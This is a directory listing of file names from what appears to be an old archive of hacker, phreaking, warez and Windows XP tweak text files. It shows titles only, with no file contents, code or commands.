Quick Shutdown for XP, How to create a shutdown shortcut..txt
Quickly Start The Shared Folder Wizard.txt
Raising Hell with Unix.txt
Rapidshare hack!!!!! Free premium acount for all.txt
Rapidshare Hacked, unlimited upload, no countdown.txt
Rapidshare Timelimit.txt
Read This! Av Compare!.txt
Recover A Corrupted System File.txt
Recover a Quick erased CD RW.txt
Reformat&Reinstall.txt
Regedit.exe & Regedt32.exe, Whats the difference.txt
Registry Disassembled a basic tutorial.txt
Reinstall Internet Explorer 6.txt
Release Codes, Read, and Learn....txt
Remarks of the President and Vice President to Silicon Valley.txt
Remote Desktop Through Company Firewall.txt
Remote Shutdown.txt
Remove Linux From Your Pc Safely, ...and restoring your MBR.txt
Remove Msn Messenger From Xp, several ways...txt
Removing Banners From Free Webhosts.txt
Removing Norton Anti-virus 2004, How to remove the Registry Enteries.txt
Rename 'recycle Bin' To Whatever You Want.txt
Reregister All .dll Files Within Registry.txt
Reset your lost Bios Password.txt
Restore JPG,JPEG,JPE Default File associations, Win XP Tweak.txt
REVERSE CODING.txt
RIGGSB~1.TXT
RIGGS_~1.TXT
RIGHTS~1.TXT
RIVERA.TXT
Routing Basics.pdf
Run Aol Without Using Aol Browser & Save Resources, connect permanently and use any browser.txt
Running A Board forum From Your Own Pc.txt
Running Vanishing Console Programs With A Click!, Ever had a console program that vanis....txt
Safely Editing the Registry....txt
Save Your Desktop Icon Settings.txt
Saving and loading Photoshop actions.txt
Scheduled Tasks - Defrag, how to set up scheduled defrags.txt
ScreenLock Professional v2.0.41.txt
SEARCH eBOOK in FTP SEARCH ENGINE.txt
Search For Ebook Server With Google.com.txt
Search like a real warez d00dz, for warez of course!.txt
Searching For Something To Download, This may help.txt
Secret Backdoor To Many Websites.txt
Secrets Of Lock Picking.txt
Securing WinXP Pro (with what win-xp has to offer.txt
Securing your WINDOWS XP computer.txt
Security holes.txt
Seisure Warrent Documents for Ripco BBS.txt
Set Google as your Default Search in IE.txt
Set Win Explorer to open the folder you want!, Little trick.txt
sick of inserting winxp cd every time your pc asks, Change Default Location of i386 Folder.txt
sidebar fix.txt
Simple Tweaks For Peak Pc Graphics Performance.txt
Single Click Shutdown.txt
Single-click To Open An Item..., IF the Folder Options is grayed out.txt
Site Security Handbook.txt
SJ-DEC~1.TXT
SJ-RESP.TXT
Slow Loggon Time, one fix for problem.txt
Slow Opening Of File Dialogs.txt
SMTP-Simple Mail Transfer Protocol.txt
Some Cool Site For Tutorials.txt
Some Google Tricks, again.txt
Some More Tips To Improve Your Winxp.txt
Sp2 For Xp Slipstream, Integrate SP2 into your XP CD.txt
Sp2 Tweaks.txt
Speed Up Internet.txt
Speed up menu display.txt
Speed up Mozilla FireFox.txt
Speed Up Your Bandwidth By 20% !, Windows uses 20% of your bandwidth.txt
Speeding up menus in XP.txt
Speeding up your internet connection under Linux and Windows.html
Spoofing emails, via telenet.txt
Standard ASCII Character Set.txt
Steps to Clean Install XP.txt
Stop A Restart Process In 3steps.txt
Stop Annoying Pop-ups Without Pop-up Blockersoutli.txt
Summary of FBI Computer Systems.txt
SUNDEVIL.TXT
SUPREM~1.TXT
System Changes To Foil Hackers And Browser Hijacke.txt
System File Checker For Windows Xp.txt
TCP packet fragment attacks against firewalls and filters.txt
Tcpip A Mammoth Description, Short and easy-Everything U want to know.txt
Telenet-The Secret Exposed.txt
telnet trick port 25.doc
Testing Wattage Consumption Of Your Computer, Measuring your computer's wattage.txt
The ABC's of Payphones part 1.txt
The ABC's of Payphones part 2.txt
The ABC's of Payphones part 3.txt
The ABC's of Payphones part 4.txt
The Antivirus Defense-in-Depth Guide.txt
The Basics of Hacking- Introduction.txt
The Baudy World of the Byte Bandit-A Postmodernist Interpreta.txt
ThE Beige BoX .txt
The Constitution in Cyberspace.txt
The Cracking Manual.txt
The difference between DVD-R, DVD+R, DVD+RW and DVD-RW.txt
The Electronic Communication Privacy Act of 1986 - A Laymans .txt
The Greatest Hacker of all time.ASC
The Hacker's League.txt
The History of British Phreaking.htm
The Inner Circle Book's Hacking Techniques.txt
The Lamahs-Guide to Pirating Software on the Internet.txt
The M.M.C. Guide to Hacking, Phreaking, Carding.txt
The Modern Phreakers Guide To Beige Boxing.txt
The Modern Phreakers Guide To Payphones.txt
The Moterola Bible.txt
The Myth of the 2600Hz Detector .txt
The National Information Infrastructure-Agenda for Action.txt
The Newbies Handbook- ' How to beging in the World of Hacking.txt
The Newbies-User's Guide to Hacking.txt
The Official Phreaker's Manual.txt
The Phreakers Handbook-1.txt
The Port Guide, Port number and info.txt
The Pre-History of Cyberspace.txt
The Price of Copyright Violation.txt
The REAL way to hack RemoteAccess.txt
The Secret Service, UUCP,and The Legion of Doom.txt
The Telephone Works.txt
The Ultimate Guide To Installing Windows Xp Sp2.txt
The Ultimate Phreaking Guide .txt
the UNIX operating system (Berkley 4.2).txt
Theft of Computer Software-A National Security Threat.txt
Thoughts on the National Research and Education Network.txt
Three Ways Of Bypass Starforce Cd Protection.txt
Tip for shutdown windows - virus.txt
Tips And Tricks, Windows XP.txt
Tips on Starting Your Own BBS.1
Tired Of Reinstalling Windows.txt
To Get And Show The Ip Via Javascript.txt
Top 5 Myths About Safe Surfing, PC Magazine.txt
Transferring Data.txt
Translating Binary To Text.txt
Translating Binary to Text2.txt
Trojan Ports.txt
Turn MSN Messenger Display Pix into User Pix on XP.txt
Turn Off Unneeded Services, speed up pc.txt
Tutorial Get the serial number you need.txt
Tutorial How to create a bootable Windows XP SP1 CD (Nero).txt
Tutorials - blacksun.box.sk
Ultimate Google Way.txt
ULTIMATE GUIDE TO BYPASS BIOS PASSWORDS!.txt
Understanding the Telephone System.txt
undocumented DOS commands.txt
Uninstall Windows Xp And Return To My Old Windows.txt
Uninstalling Norton 2004 Products.txt
UNIX Computer Security Checklist.0
UNIX Use and Security - By the Prophet.txt
UNIX Use and Security From The Ground Up.htm
UNIX- A Hacking Tutorial.SIR
Unlimited Rapidshare Downloads.txt
Untold Window Tips.txt
Untold Windows Secrets.txt
Untold Windows Tips.txt
Unused space on hard drives recovered.txt
Use Hotkeys To Switch Programs.txt
Useful Download Guide, Fix Down, 0daycn Ttdown, Links.txt
User's Guide To Avoiding Virus Infections, Keeping an eye out for viruses.txt
Using Google As A Calculator, A Tutorial.txt
Using Google for searching ebooks.txt
Using Rapid Share, How to use them and skip the BS.txt
Video Avatars.txt
Viewing Leftover Driver Entries.txt
Virtual Memory Information.txt
Virtual Memory Optimization Guide Rev. 4.0 - Final.txt
Viruii FAQ.txt
Virus-Trojan FAQ.txt
Want To Download Torrent File By Using Google.txt
Warez Definations.txt
WAREZ DEFINITION.txt
Way To Download From Brturbo, FireFox.txt
We Don't Need No Education, Online classes made easy.txt
Welcome to The king's meaning's of how to kick some-one's ASS!.txt
What Files are Legal for Distribution on a BBS.txt
What is the Registry.txt
What Should I Do With Image Files.txt
What To Look For In A Code Hacking Program.htm
What To Look For In A Code Hacking Program.txt
What You Should Know About Computer Viruses.DNA
What You Wanted To Know About Movie Jargon, But Were Afraid To Ask.txt
When Good Discs Go Bad.txt
Where Is Winipcfg In Winxp.txt
Who's Seeding The Net With Spyware.txt
Why wait 35 Seconds at eZshare.txt
Win 2000 Dr. Watsson.txt
Windows 2000 Tips & Tricks.txt
Windows 2003 System Restore, How to activate system restore in W2K3.txt
Windows Scan Count Down Time.txt
Windows Shortcuts.txt
WINDOWS TRUE HIDDEN FILES.txt
Windows Tweak, Hack Your Start Button.txt
Windows Xp - Speed Up Your Network and Internet Access.txt
WINDOWS XP HIDDEN APPS.txt
Windows XP Registry Tweaks.txt
Windows XP Startup and Performance Tweaks.txt
Windows Xp Tips 'n' Tricks.txt
Windows Xp Tweaks, A work in progress.txt
Windows XP Tweaks.txt
WinRar Tutorial - Compression profiles, passwords and more.txt
Winsock 2 Repair.txt
WinXP 3 Tips.txt
Winxp Application Defrag, faster access for used programs.txt
Winxp Applications Startup Time, Decrease your Applications startup time.txt
WinXP Bootable CD.txt
Winxp System Response, reboot whitout rebooting.txt
Winxp Tips And Tricks, Winsock 2 repair.txt
Xp Auto Install.txt
Xp Folder View Does Not Stay To You're Setting., Grab your registry editor and join in.txt
XP REPAIR INSTALL.txt
XP Tweaking.txt
Yahoo + geocities Posts.txt
Yahoo Chat Commands how to.rtf
Yahoo Messeger, no ad's.txt
You Want Lots Of Music, Appz, Anything, Try Dex Hunting.txt
Your Home Page Nevr Being Changed.txt
Your Own Home Server - Introduction.txt
Zen and the Art of Fone Phreaking `97 .txt
[PHP] Navigations.txt